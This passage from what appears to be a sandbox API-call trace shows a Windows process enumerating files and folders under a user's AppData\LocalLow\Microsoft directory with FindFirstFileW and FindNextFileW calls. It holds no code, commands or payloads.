cAlternateFileName="803B9E~1")) returned 1 [0057.612] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0057.612] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0057.613] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0057.613] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0x0, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0057.613] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x0, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0057.613] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x0, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0057.613] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x196, dwReserved0=0x0, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0057.613] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbf0dd70, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0x0, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0057.613] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0x0, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0057.614] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0x0, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0057.614] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0057.614] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0057.614] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0057.614] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0057.614] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0057.615] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0057.615] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0x0, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0057.615] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0x0, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0057.615] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0057.615] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0057.615] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0057.615] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0x0, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0057.616] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0057.616] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0057.616] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0057.616] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0057.616] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0x0, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0057.616] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0x0, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0057.616] FindClose (in: hFindFile=0x6c4468 | out: hFindFile=0x6c4468) returned 1 [0057.616] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.616] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0057.616] FindClose (in: hFindFile=0x6c4428 | out: hFindFile=0x6c4428) returned 1 [0057.617] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0057.617] FindNextFileW (in: hFindFile=0x6c4028, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0057.617] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*", lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4428 [0057.618] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.618] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.618] FindClose (in: hFindFile=0x6c4428 | out: hFindFile=0x6c4428) returned 1 [0057.618] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0057.618] FindNextFileW (in: hFindFile=0x6c4028, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0057.618] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*", lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4428 [0057.618] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.618] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.618] FindClose (in: hFindFile=0x6c4428 | out: hFindFile=0x6c4428) returned 1 [0057.618] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0057.618] FindNextFileW (in: hFindFile=0x6c4028, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0057.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4428 [0057.619] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.619] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.619] FindClose (in: hFindFile=0x6c4428 | out: hFindFile=0x6c4428) returned 1 [0057.619] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, 